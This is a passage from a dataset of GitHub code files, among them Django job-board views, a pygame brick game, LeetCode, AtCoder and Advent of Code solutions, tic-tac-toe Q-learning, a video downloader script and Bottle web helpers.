redirect(\"home:homepage\")\n\t\n\tapplied = False\n\tcantApply = False\n\tsaved = False\n\tif job.creator == request.user:\n\t\tcantApply = True\n\telse:\t\n\t\trela = JobUserR.objects.filter(uid=request.user).filter(jid=job)\n\t\tif len(rela) != 0:\n\t\t\tif rela[0].isApply:\n\t\t\t\tapplied = True\n\t\t\tif rela[0].isStarted:\n\t\t\t\tsaved = True\n\n\tcontext = {\n\t\t\"job\": job,\n\t\t\"applied\": applied,\n\t\t\"cantApply\": cantApply,\n\t\t\"saved\": saved,\n\t}\n\treturn render(request=request, template_name=\"home/jobdetail.html\",context=context)\n\ndef jobDeleteView(request,pk=None):\n\ttry:\n\t\tjob = Job.objects.get(pk=pk)\n\texcept:\n\t\tmessages.error(request,\"You cannot delete this job.\")\n\t\treturn redirect(\"home:homepage\")\n\tif request.user.pk != job.creator.pk:\n\t\tmessages.error(request,\"You cannot delete this job.\")\n\t\treturn redirect(\"home:homepage\")\n\t\n\twhoApplied = job.jobuserr_set.filter(isApply=True)\n\tmsg = f\"Job \\\"{job.title}\\\" is now deleted.\"\n\tfor applicant in whoApplied:\n\t\tnewNoti = Notification.objects.create(user=applicant.uid, isAboutJob=True,content=msg\n\t\t\t)\n\t\tnewNoti.save()\n\tjob.delete()\n\tmessages.success(request,\"Job Deleted.\")\n\treturn redirect(\"home:jobs\")\n\ndef jobApplyView(request,pk=None):\n\ttry:\n\t\tjob = Job.objects.get(pk=pk)\n\texcept:\n\t\tmessages.error(request,\"No such job.\")\n\t\treturn redirect(\"home:homepage\")\n\tif job.creator == request.user:\n\t\tmessages.error(request,\"You cannot apply for your own job.\")\n\t\treturn redirect(\"home:jobs\")\n\ttry:\n\t\tjur = JobUserR.objects.get(uid=request.user,jid=job,isApply=True)\n\t\tmessages.error(request,\"You have already applied.\")\n\t\treturn redirect(\"home:jobs\")\n\texcept:\n\t\tpass\t\n\n\tform = ApplicationForm(request.POST or None)\n\tif request.method == 'POST':\n\t\tif form.is_valid():\n\t\t\ttry:\n\t\t\t\tjur = JobUserR.objects.get(uid=request.user,jid=job,isStarted=True)\n\t\t\t\tjur.graduationDate = form.cleaned_data[\"graduationDate\"]\n\t\t\t\tjur.startDate = form.cleaned_data[\"startDate\"]\n\t\t\t\tjur.isApply = True\n\t\t\t\tjur.isStarted = False\n\t\t\t\tjur.save()\n\t\t\texcept:\n\t\t\t\tnewA = form.save(commit=False)\n\t\t\t\tnewA.uid = request.user\n\t\t\t\tnewA.jid = job\n\t\t\t\tnewA.isApply = 
True\n\t\t\t\tnewA.isStarted = False\n\t\t\t\tnewA.save()\n\t\t\tmessages.success(request,\"Your application has been made.\")\n\t\t\treturn redirect(\"home:detail-job\",pk=pk)\n\t\n\tcontext = {\n\t\t'form':form,\n\t\t'job':job,\n\t}\n\treturn render(request,\"home/jobapply.html\",context=context)\n\ndef jobSaveView(request,pk=None):\n\ttry:\n\t\tjob = Job.objects.get(pk=pk)\n\texcept:\n\t\tmessages.error(request,\"No such job.\")\n\t\treturn redirect(\"home:homepage\")\n\n\ttry:\n\t\tjur = JobUserR.objects.get(uid=request.user,jid=job,isApply=True)\n\t\tmessages.error(request,\"You have already applied.\")\n\t\treturn redirect(\"home:detail-job\",pk=pk)\n\texcept:\n\t\tpass\n\ttry:\n\t\tjur = JobUserR.objects.get(uid=request.user,jid=job,isStarted=True)\n\t\tmessages.error(request,\"You have already saved.\")\n\t\treturn redirect(\"home:detail-job\",pk=pk)\n\texcept:\n\t\tpass\n\t\n\ttry:\n\t\tnewR = JobUserR.objects.create(jid=job,uid=request.user,isStarted=True,graduationDate=datetime.datetime.now(),startDate=datetime.datetime.now())\n\t\tnewR.save()\n\t\tmessages.success(request,\"You have saved the job.\")\n\texcept:\n\t\tmessages.error(request,\"Failed to save the job.\")\n\t\treturn redirect(\"home:jobs\")\n\n\treturn redirect(\"home:detail-job\",pk=pk)\ndef cancelApplyView(request,pk=None):\n\ttry:\n\t\tjob = Job.objects.get(pk=pk)\n\t\tjur = JobUserR.objects.get(uid=request.user,jid=job,isApply=True)\n\t\tjur.delete()\n\t\tmessages.success(request,\"Your application has been canceled.\")\n\t\treturn redirect(\"home:detail-job\",pk=pk)\n\texcept:\n\t\tmessages.error(request,\"Failed to cancel application.\")\n\t\treturn redirect(\"home:jobs\")\ndef unsaveView(request,pk=None):\n\ttry:\n\t\tjob = Job.objects.get(pk=pk)\n\t\tjur = JobUserR.objects.get(uid=request.user,jid=job,isStarted=True,isApply=False)\n\t\tjur.delete()\n\t\tmessages.success(request,\"Job has been unsaved.\")\n\t\treturn redirect(\"home:detail-job\",pk=pk)\n\texcept Exception as e:\n\t\tprint(e)\n\t\tmessages.error(request,\"Failed to unsave job.\")\n\t\treturn redirect(\"home:jobs\")\n\t","repo_name":"piyushmanjhi/InCollege","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22575861066","text":"\"\"\"\n Project name: SimpleBrickBreak\n File name: main.py\n Author: Hunter Webb\n Date created: 10/18/2021\n Date last modified: 10/24/2021\n Python Version: 3.9.5\n\"\"\"\n\n# Module Imports\n\nimport random\nimport pygame\nimport sys\nfrom pygame.locals import *\nfrom pygame import gfxdraw\n\n# Constants\n\nGAME_OVER = 0\n\nSOLID = 0\nSINGLE = 1\nDOUBLE = 2\nTRAIL = 3\nEXTRA_LIFE = 4\n\nCOLORS = [\n pygame.Color(\"#272727\"), # 0 SOLID\n pygame.Color(\"#28AFB0\"), # 1 SINGLE\n pygame.Color(\"#A11692\"), # 2 DOUBLE\n pygame.Color(\"#FF4F79\"), # 3 TRAIL / +1 BALL\n pygame.Color(\"#5CF64A\"), # 4 EXTRA_LIFE\n pygame.Color(\"#E4FF1A\"), # 5 BALL\n pygame.Color(\"#F1FFE7\") # 6 PADDLE\n]\n\nSCREEN_WIDTH = 400\nSCREEN_HEIGHT = 600\n\nPADDING = 1\n\nPADDLE_WIDTH = 100\nBALL_R = 10\nBRICK_W = 80\nBRICK_H = 30\nN_BRICK_W = SCREEN_WIDTH / (BRICK_W + PADDING)\nN_BRICK_H = (SCREEN_HEIGHT / 3) / (BRICK_H + PADDING)\n\n# Movement Initializers\n\nSPEED = 2\nL_DOWN = False\nR_DOWN = False\n\n\n# Classes\n\nclass Paddle(object):\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def draw(self):\n self.rect = pygame.Rect(int(self.x), int(self.y), PADDLE_WIDTH, 10)\n 
pygame.gfxdraw.box(screen, self.rect, COLORS[6])\n\n def move(self, d):\n if d and self.x > 0:\n self.x -= SPEED\n if not d and self.x < SCREEN_WIDTH - PADDLE_WIDTH:\n self.x += SPEED\n\n\nclass Ball(object):\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.vx = random.randint(-5, 5) / 10\n self.vy = 10 / SPEED\n\n def draw(self):\n pygame.gfxdraw.filled_circle(screen, int(self.x), int(self.y), BALL_R, COLORS[5])\n\n def update(self):\n global GAME_OVER\n\n # Bottom of the screen\n\n if self.y >= SCREEN_HEIGHT - BALL_R:\n GAME_OVER = 1\n\n # All other walls\n\n if not BALL_R < int(self.x) < SCREEN_WIDTH - BALL_R:\n self.vx *= -1\n if not BALL_R < int(self.y) < SCREEN_HEIGHT - BALL_R:\n self.vy *= -1\n\n # Paddle Collision\n\n if paddle.rect.collidepoint(ball.x, ball.y + BALL_R):\n self.vy *= -1\n\n if L_DOWN:\n if self.vx >= 0:\n self.vx -= 0.1\n else:\n self.vx -= 0.1\n if R_DOWN:\n if self.vx <= 0:\n self.vx += 0.1\n else:\n self.vx += 0.1\n\n if self.vx > 1:\n self.vx = 1\n if self.vx < -1:\n self.vx = -1\n\n self.y += self.vy / SPEED\n self.x += self.vx / SPEED\n\n self.draw()\n\n\nclass Brick(object):\n def __init__(self, x, y, type):\n self.x = x\n self.y = y\n self.type = type\n self.color = COLORS[type]\n self.rect = pygame.Rect(self.x, self.y, BRICK_W, BRICK_H)\n\n def draw(self):\n pygame.gfxdraw.box(screen, self.rect, self.color)\n\n def update(self):\n\n # Brick Collision\n\n if self.rect.collidepoint(ball.x, ball.y - BALL_R) or self.rect.collidepoint(ball.x, ball.y + BALL_R):\n ball.vy *= -1\n brick_array.remove(self)\n pass\n if self.rect.collidepoint(ball.x - BALL_R, ball.y) or self.rect.collidepoint(ball.x + BALL_R, ball.y):\n ball.vx *= -1\n brick_array.remove(self)\n\n if len(brick_array) == 0:\n print('none left')\n\n self.draw()\n\n\n# Game Initialization\n\npygame.init()\npygame.display.set_caption(\"Simple Brick Break\")\npygame.font.init()\nscreen = pygame.display.set_mode([SCREEN_WIDTH, SCREEN_HEIGHT])\npaddle = Paddle((SCREEN_WIDTH - PADDLE_WIDTH) / 2, SCREEN_HEIGHT - 50)\nball = Ball(SCREEN_WIDTH / 2, SCREEN_HEIGHT / 2)\nbrick_array = []\npygame.display.update()\n\nfor x in range(int(N_BRICK_W) + 1):\n for y in range(int(N_BRICK_H)):\n brick_array.append(Brick(x * (BRICK_W + PADDING), y * (BRICK_H + PADDING), SINGLE))\n\n\n# Game Loop\n\ndef move():\n if L_DOWN:\n paddle.move(True)\n elif R_DOWN:\n paddle.move(False)\n\n\nwhile True:\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == K_LEFT:\n L_DOWN = True\n elif event.key == K_RIGHT:\n R_DOWN = True\n if event.type == KEYUP:\n if event.key == K_LEFT:\n L_DOWN = False\n elif event.key == K_RIGHT:\n R_DOWN = False\n elif event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n screen.fill(0)\n\n if GAME_OVER:\n font = pygame.font.SysFont('arial black', 55)\n text = font.render(\"GAME OVER!\", True, pygame.Color(\"RED\"))\n text_rect = text.get_rect(center=(SCREEN_WIDTH / 2, SCREEN_HEIGHT / 2))\n screen.blit(text, text_rect)\n else:\n move()\n paddle.draw()\n ball.update()\n for brick in brick_array:\n brick.update()\n\n pygame.display.flip()\n pygame.time.Clock().tick(60)\n","repo_name":"oh/SimpleBrickBreak","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28208172306","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/8/28 08:34\n# @Author : ck\n\"\"\"\nProblem: <Swap Nodes in Pairs>\n Given a linked list, swap every two adjacent nodes and return the swapped list.\n\n 
You may not simply change the values inside the nodes; you must actually swap the nodes themselves.\n\n Example:\n\n Given 1->2->3->4, you should return 2->1->4->3.\n\"\"\"\n\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n\n def add_node(self, tail: ListNode, p: ListNode, q: ListNode) -> ListNode:\n new_node1 = ListNode(p.val)\n new_node2 = ListNode(q.val)\n tail.next = new_node2\n tail = tail.next\n tail.next = new_node1\n tail = tail.next\n return tail\n\n def swapPairs(self, head: ListNode) -> ListNode:\n result = ListNode(0)\n if not head:\n return result.next\n tail = result\n p = head\n q = p.next\n\n while p and q:\n tail = self.add_node(tail, p, q)\n if q: p = q.next\n if p: q = p.next\n if p:\n new_node = ListNode(p.val)\n tail.next = new_node\n return result.next\n\n\n\"\"\"\n Recursive approach\n\"\"\"\n\n\nclass Solution1:\n def swapPairs(self, head: ListNode) -> ListNode:\n if head == None or head.next == None:\n return head\n\n res = head.next\n head.next = self.swapPairs(head.next.next)\n res.next = head\n\n return res\n\n\nif __name__ == \"__main__\":\n s = Solution()\n\n data = [1, 2, 3, 4]\n head = ListNode(data[0])\n p = head\n for e in data[1:]:\n node = ListNode(e)\n p.next = node\n p = p.next\n result = s.swapPairs(head)\n while result:\n print(result.val)\n result = result.next\n\n","repo_name":"leet001/leetcode_share","sub_path":"medium/Q_24.py","file_name":"Q_24.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21579474307","text":"from random import choice\nfrom utils import all_proper_move\nfrom utils import activate_end\nfrom utils import control_win\nfrom utils import random_player\n\n\n\n\ndef q_table_generator(test_games):\n\n \n '''\n Our Q table is a dictionary whose key is a string encoding the board state.\n Initially we assume a value of 0 for every state, except winning states.\n We generate the Q table with all legal states by playing\n a significant number of games between random players. 
\n The number of legal states in tic tac toe is 5478;\n there is no obvious way to calculate that.\n '''\n \n ALPHA = 0.9\n GAMMA = 0.9\n \n \n legal_state_number = 5478\n \n \n Q_table = {}\n \n BOARD = ['_', '_', '_', '_', '_', '_', '_', '_', '_']\n Q_table[''.join(BOARD)] = 0\n while len(Q_table) < legal_state_number:\n BOARD = ['_', '_', '_', '_', '_', '_', '_', '_', '_']\n sign = 'O'\n turn = choice(['player_1', 'player_2'])\n while not activate_end(BOARD):\n if turn == 'player_1':\n random_player(BOARD, sign)\n else:\n random_player(BOARD, sign)\n if control_win(BOARD):\n if sign == 'O':\n Q_table[''.join(BOARD)] = 1\n else:\n Q_table[''.join(BOARD)] = -1\n break\n else:\n Q_table[''.join(BOARD)] = 0\n if sign == 'O':\n sign = 'X'\n else:\n sign = 'O'\n if turn == 'player_1':\n turn = 'player_2'\n else:\n turn = 'player_1'\n \n \n \n Q_control = dict(zip(Q_table.keys(),\n [0 for k in range(len(Q_table.values()))])) \n # Completing the Q table by games with random players in a purely exploratory way\n \n for k in range(test_games):\n BOARD = ['_', '_', '_', '_', '_', '_', '_', '_', '_']\n sign = 'O'\n episode = []\n signs = []\n episode.append(''.join(BOARD))\n while not activate_end(BOARD):\n \n if sign == 'O':\n if not Q_control[''.join(BOARD)]:\n Q_control[''.join(BOARD)] = 1\n \n random_player(BOARD, sign)\n signs.append(sign)\n episode.append(''.join(BOARD))\n else:\n if not Q_control[''.join(BOARD)]:\n Q_control[''.join(BOARD)] = 1\n \n random_player(BOARD, sign)\n signs.append(sign)\n episode.append(''.join(BOARD))\n \n if control_win(BOARD):\n break\n if sign == 'O':\n sign = 'X'\n else:\n sign = 'O'\n \n \n episode = episode[:len(episode) - 1]\n episode = episode[::-1]\n signs = signs[::-1]\n for k in range(len(episode)):\n Q_table[episode[k]] = Q_table[episode[k]] + ALPHA * (GAMMA *\\\n max([Q_table[element] for element in all_proper_move([*episode[k]], signs[k])])\\\n - Q_table[episode[k]]) \n\n return Q_table, Q_control","repo_name":"KordianChi/tic-tac-toe_with_Q_learning","sub_path":"q_table.py","file_name":"q_table.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14695882666","text":"import os \nimport json\n\ndef downloadVideos(vidName, downloadLink):\n\tcommand \t= f\"aria2c -s 10 -j 10 -x 16 -k 5M --file-allocation=none '{downloadLink}' -o '{vidName.replace(' ', '_').replace('/', '')}.mp4' -c\"\n\tprint(command)\n\tos.system(command)\n\ndef main():\n\tlinksFile \t= \"downloads.json\"\n\twith open(linksFile, 'r') as f: contents = json.loads(f.read().strip())\n\n\tfor objs in contents:\n\t\tfor name, ddl in objs.items():\n\t\t\tdownloadVideos(name, ddl)\n\nif __name__ == '__main__':\n\ttry:\n\t\tmain()\n\n\texcept KeyboardInterrupt:\n\t\texit(\"[!] okay-sed :(\")","repo_name":"Hollow667/infosecinstitute-dl","sub_path":"downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"71393210066","text":"\"\"\"\nI used a dataclass for this task today just because I wanted to finally try it out. 
Also I was curious if it helps\nto write a classmethod that parses the input and then a bunch of staticmethod to do the actual work on things.\nTurns out this actually makes the code very readable and tidied up, so I might come back to this in the future.\nThere was no real necessity for the dataclass in the end however - anyways I still liked it.\n\"\"\"\nfrom dataclasses import dataclass\nfrom collections import defaultdict\n\n_uniques = [2, 3, 4, 7]\n\n\n@dataclass\nclass SubmarineInterface:\n input: list\n output: list\n\n @classmethod\n def parser(cls, s: list):\n input = [i.split(' | ')[0] for i in s]\n output = [i.split(' | ')[1] for i in s]\n return cls(input, output)\n\n @staticmethod\n def count_unique_numbers(numbers: list):\n cnt = 0\n for num in ' '.join(numbers).split(' '):\n if len(num) in _uniques:\n cnt += 1\n return cnt\n\n @staticmethod\n def decode_wires(line: str):\n wires = defaultdict(set)\n while len(wires) < 10 or set() in wires.values():\n for char in line.split(' '):\n if len(char) == 6 and wires[1].issubset(set(char)) and not wires[4].issubset(set(char)):\n wires[0] = set(char)\n elif len(char) == 2:\n wires[1] = set(char)\n elif len(char) == 5 and wires[1].issubset(set(char)):\n wires[3] = set(char)\n elif len(char) == 4:\n wires[4] = set(char)\n elif len(char) == 5 and wires[4].difference(wires[1]).issubset(set(char)):\n wires[5] = set(char)\n elif len(char) == 6 and not wires[1].issubset(set(char)):\n wires[6] = set(char)\n elif len(char) == 3:\n wires[7] = set(char)\n elif len(char) == 7:\n wires[8] = set(char)\n elif len(char) == 6 and wires[1].issubset(set(char)) and wires[4].issubset(set(char)):\n wires[9] = set(char)\n elif len(char) == 5 and not set(char).issubset(wires[3]) and not set(char).issubset(wires[5]):\n wires[2] = set(char)\n else:\n pass\n return wires\n\n def decode_outputs(self, inputs: str, outputs: str):\n result = ''\n decode = self.decode_wires(inputs)\n for out in outputs.split(' '):\n result += str(list(decode.keys())[list(decode.values()).index(set(out))])\n return int(result)\n\n\nfile = 'input_puzzles/day_8.txt'\nwith open(file, 'r') as f:\n data = f.read().splitlines()\n\nsf = SubmarineInterface.parser(data)\nres_p1 = sf.count_unique_numbers(sf.output)\nres_p2 = sum([sf.decode_outputs(sf.input[ii], out) for ii, out in enumerate(sf.output)])\n\nprint(f'Part 1: {res_p1}')\nprint(f'Part 2: {res_p2}')\n","repo_name":"kolschew/adventofcode_2021","sub_path":"aoc_day_8.py","file_name":"aoc_day_8.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2579735312","text":"\r\n#Imports\r\n\r\nfrom textblob import TextBlob\r\nfrom newspaper import Article\r\nimport nltk\r\nnltk.download(\"punkt\")\r\n\r\nurl = \"https://en.wikipedia.org/wiki/Classical_architecture\"\r\narticle = Article(url)\r\n\r\narticle.download()\r\narticle.parse()\r\narticle.nlp()\r\n\r\ntext = article.summary\r\nprint(text)\r\n\r\nblob = TextBlob(text)\r\nsentiment = blob.sentiment.polarity #from -1 to 1\r\nprint(f\"The sentiment of this text is {sentiment}\")\r\n\r\n\r\nwith open(\"C:/Users/danie/PycharmProjects/TextAnalysis/venv/mytext.txt\",\"r\") as f:\r\n text = f.read()\r\n\r\nprint(text)\r\nblob = TextBlob(text)\r\nsentiment = blob.sentiment.polarity # from -1 to 1\r\nprint(f\"The sentiment of this text is 
{sentiment}\")","repo_name":"danielelongo14/MachineLearning","sub_path":"TextSentimentAnalysis.py","file_name":"TextSentimentAnalysis.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5533301657","text":"import json\n\n\nclass Load:\n json_data = {}\n\n def __init__(self, name, type):\n self.name = name\n self.type = type\n self.read_json()\n\n def read_json(self):\n with open('el_loads.json') as loads:\n self.json_data = json.load(loads)\n\n def get_consumption(self):\n for type_of_load in self.json_data['loads']:\n if type_of_load['name'] == self.name:\n for types in type_of_load['types']:\n if types['name'] == self.type:\n return types['consumption']\n return None\n\n\nif __name__ == '__main__':\n l = Load('bulb', 'halogen')\n print(l.get_consumption())","repo_name":"icavrak/SmartHomeSim","sub_path":"load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12187791377","text":"import csv\nimport os\nimport random\n\nfrom shutil import copy, copyfile\nfrom keras.preprocessing.image import ImageDataGenerator\n\n\"\"\"\nSeparates train and test data and copies them to the folder, \nthat match their category\n\"\"\"\ndef sort_data_to_folders(train_p, test_p):\n root = \"data/car_ims/\"\n train_root = \"data/train/\"\n test_root = \"data/test/\"\n annotation_file = \"data/anno.csv\"\n\n with open(annotation_file, 'rt') as csvfile:\n reader = csv.DictReader(csvfile, delimiter=';')\n data = {}\n for row in reader:\n data[row[\"Image\"]] = row[\"class\"]\n keys = list(data.keys())\n train_size = int(len(keys) * train_p)\n test_size = int(len(keys) * test_p)\n random.shuffle(keys)\n for name in keys[:train_size]:\n directory = train_root + data[name] + \"/\"\n if not os.path.exists(directory):\n os.makedirs(directory)\n copyfile(root + name, directory)\n print(\"sorting train images to directories done!\")\n\n for name in keys[-test_size:]:\n directory = test_root + data[name] + \"/\"\n if not os.path.exists(directory):\n os.makedirs(directory)\n copyfile(root + name, directory)\n print(\"sorting test images to directories done!\")\n\n image_gen = ImageDataGenerator(rescale=1.0 / 255)\n train_iterator = image_gen.flow_from_directory(\"data/car_ims/\",\n batch_size=128,\n target_size=(224, 224))\n\nsort_data_to_folders(.8, .2)\n","repo_name":"banda13/Carrecognizer","sub_path":"input/stanford/sorter.py","file_name":"sorter.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"72763990867","text":"from django.conf import settings\nfrom django.conf.urls import *\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^$', 'main.views.index', name=\"home\"),\n url(r'^home$', 'main.views.home', name=\"project_data\"),\n url(r'^upload$', 'main.views.upload', name=\"upload\"),\n url(r'^project$', 'main.views.create_project', name=\"project\"),\n url(r'^apiUpload/(?P\\d+)$', 'main.views.apiUpload', name=\"apiUpload\"),\n url(r'^login$', 'django.contrib.auth.views.login', name=\"login\"),\n url(r'^logout$', 'django.contrib.auth.views.logout', name=\"logout\"),\n url(r'^add_edit_effort/(?P\\d+)$', 
'main.views.add_edit_effort', name='add_edit_effort'),\n url(r'^project/(?P\\d+)$', 'main.views.project_details', name='project_details'),\n (r'^admin/', include(admin.site.urls)),\n)\n\nif settings.DEBUG:\n urlpatterns += patterns('',\n (r'^site_media/(?P.*)$', 'django.views.static.serve', \n {'document_root': settings.MEDIA_ROOT}),)\n urlpatterns += staticfiles_urlpatterns()\n","repo_name":"bhartenduspoton/Versioning-pilot","sub_path":"example_project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30088121916","text":"import jinja2\nsecret=\"dupiedupiedupie!Ana!Duppy!DyppyDyppyDuppy!\"\nimport os.path\n\n\n\nclass WSGIToolsClass():\n def __init__(self):\n self.bottle.post (\"/newuser\") (self.createAccount)\n self.bottle.route(\"/resource//\") (self.getStaticFiles)\n self.bottle.route(\"/favicon.ico\") (self.getStaticICO)\n\n self.bottle.route(\"/\") (self.checkAuth(self.loadMainPage))\n self.bottle.route(\"/deleteuser\")(self.checkAuth(self.deletemyaccount))\n super().__init__()\n\n def getStaticICO(self):\n return self.bottle.static_file(\"favicon.ico\", root='/var/www/wsgi/dupie/resource/img/')\n\n\n def createAccount(self):\n username = self.bottle.request.forms.get(\"username\")\n self.bottle.response.set_cookie(\"username\",username,secret=secret )\n self.bottle.response.set_cookie(\"uid\",101, secret=secret)\n self.bottle.response.set_cookie(\"sessionid\",1001, secret=secret)\n return self.getTemplate('user_new_post.html').render(\n DTO={ \"username\":username },\n BreadCrumbs=[]\n )\n\n def getStaticFiles(self,folder, filename):\n # if developing comment out below line\n if (filename[-3:] != \"mp3\" and filename[-3:] != \"css\" and filename[-3:] != \".js\"):\n self.bottle.response.set_header('Cache-Control', 'must-revalidate')\n else:\n# self.bottle.response.set_header(\"Cache-Control\", \"public, max-age=604800\")\n print (filename)\n\n # TODO: this probably isn't necessary, but will put regex here\n # if filename in [\"aquabutton.jpg\",\"nh1.mp3\",\"questionbox.jpg\"]:\n if (folder==\"vocab\") or (folder==\"prompt\"):\n if (os.path.isfile(\"/var/www/wsgi/dupie/resource/%sx/%s\" % (folder,filename))):\n return self.bottle.static_file(filename, root='/var/www/wsgi/dupie/resource/%sx' % (folder))\n\n \n return self.bottle.static_file(filename, root='/var/www/wsgi/dupie/resource/%s' % (folder))\n # else:\n # return bottle.abort(404, \"File not found.\")\n\n def loadMainPage(self):\n return self.getTemplate('main_main_get.html').render(\n DTO={ \"username\":self.cookie(\"username\")},\n BreadCrumbs=[]\n )\n\n def deletemyaccount(self):\n self.bottle.response.delete_cookie(\"username\") \n self.bottle.response.delete_cookie(\"uid\") \n self.bottle.response.delete_cookie(\"sessionid\") \n return self.getTemplate('user_delete_get.html').render(\n DTO={ \"username\":self.cookie(\"username\")},\n BreadCrumbs=[]\n )\n\n def cookie(self,name):\n return self.bottle.request.get_cookie(name, secret=secret)\n\n def getTemplate(self, document):\n file_loader = jinja2.FileSystemLoader(\n [\n \"/var/www/wsgi/dupie/template/quiz\",\n \"/var/www/wsgi/dupie/template/tools\",\n \"/var/www/wsgi/dupie/template/templates\",\n \"/var/www/wsgi/dupie/template/videos\",\n \"/var/www/wsgi/dupie/template/ttsbatchload\",\n \"/var/www/wsgi/dupie/template/review\"\n ]\n \n )\n env = jinja2.Environment(loader=file_loader)\n template = env.get_template(document)\n return 
template\n\n\n\n\n\nclass CheckAuthClass():\n def __init__(self):\n super().__init__()\n\n def butWhoAreYou(self):\n return self.getTemplate('user_new_get.html').render(\n DTO={ \"username\":self.cookie(\"username\")},\n BreadCrumbs=[]\n )\n\n def userUnknown(self):\n self.bottle.response.set_header('Cache-Control', 'must-revalidate')\n return (str(self.bottle.request.get_cookie(\"username\",secret=secret)) == \"None\")\n\n def checkAuth(self, bottle_function):\n def wrapper(*args, **kwargs):\n if self.userUnknown(): \n return self.butWhoAreYou()\n else:\n return bottle_function(*args, **kwargs)\n return wrapper","repo_name":"Dupie696/dupie","sub_path":"src/website/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":4105,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"34017458650","text":"\nfrom itertools import product, combinations\nimport math\nimport random\nimport sys\nimport collections\nfrom pathlib import Path\nimport numpy as np\n\nrandom.seed(42)\n\nif Path(__file__).stem == \"Main\":\n DEBUG_OUT = False\nelse:\n DEBUG_OUT = False\n DEBUG_OUT = True\n\n\ndef q_E_top():\n if DEBUG_OUT:\n \"\"\"\n q_E(\n 9, 3,\n [\n [8, 3],\n [4, 2],\n [2, 1],\n ]\n )\n q_E(\n 100, 6,\n [\n [1, 1],\n [2, 3],\n [3, 9],\n [4, 27],\n [5, 81],\n [6, 243],\n ]\n )\n \"\"\"\n q_E(\n 9999, 10,\n [\n [540, 7550],\n [691, 9680],\n [700, 9790],\n [510, 7150],\n [415, 5818],\n [551, 7712],\n [587, 8227],\n [619, 8671],\n [588, 8228],\n [176, 2461],\n ]\n )\n else:\n q_E()\n\n\ndef q_E(h=None, n=None, ab_list=None):\n if not DEBUG_OUT:\n h, n = list(map(int, input().split()))\n a_list = []\n b_list = []\n for _ in range(n):\n a, b = list(map(int, input().split()))\n a_list.append(a)\n b_list.append(b)\n else:\n a_list = []\n b_list = []\n for a, b in ab_list:\n a_list.append(a)\n b_list.append(b)\n\n cp = [] # cost performance\n for a, b in zip(a_list, b_list):\n cp.append(a / b)\n\n b_used = 0\n while True:\n i_most_cp_magic = cp.index(max(cp))\n\n # If one cast of the most cost-effective spell brings h <= 0, we are done\n if h - a_list[i_most_cp_magic] <= 0:\n b_used += b_list[i_most_cp_magic]\n break\n\n # Otherwise, just keep reducing h with the most cost-effective spell\n b_used += b_list[i_most_cp_magic] * (h // a_list[i_most_cp_magic])\n h = h % a_list[i_most_cp_magic]\n if h==0:\n break\n\n # update cp table\n for i in range(n):\n if h < a_list[i]:\n # the cost performance drops\n cp[i] = h / b_list[i]\n\n print(b_used)\n\n\n\n\nif __name__ == \"__main__\":\n # q_A_top()\n # q_B_top()\n # q_C_top()\n # q_D_top()\n q_E_top()\n","repo_name":"zinziroge/atcoder","sub_path":"src/abc/abc153.py","file_name":"abc153.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1225471096","text":"import logging\nfrom config.base_config import *\nfrom selenium import webdriver\n\n# Utility class\nclass DriverUtils:\n __driver = None\n __switch = False\n\n # Get the browser driver\n @classmethod\n def get_driver(cls):\n if cls.__driver is None:\n logging.info(\"create chrome driver\")\n cls.__driver = webdriver.Chrome(options=CHROME_OPTIONS)\n cls.__driver.maximize_window()\n cls.__driver.implicitly_wait(5)\n else:\n logging.info(\"use existing chrome driver\")\n return cls.__driver\n\n # Quit the browser driver\n @classmethod\n def quit_driver(cls):\n if cls.__driver is not None:\n logging.info(\"quit chrome driver\")\n cls.__driver.quit()\n cls.__driver = None\n else:\n logging.info(\"chrome driver is still alive\")\n\n @classmethod\n def 
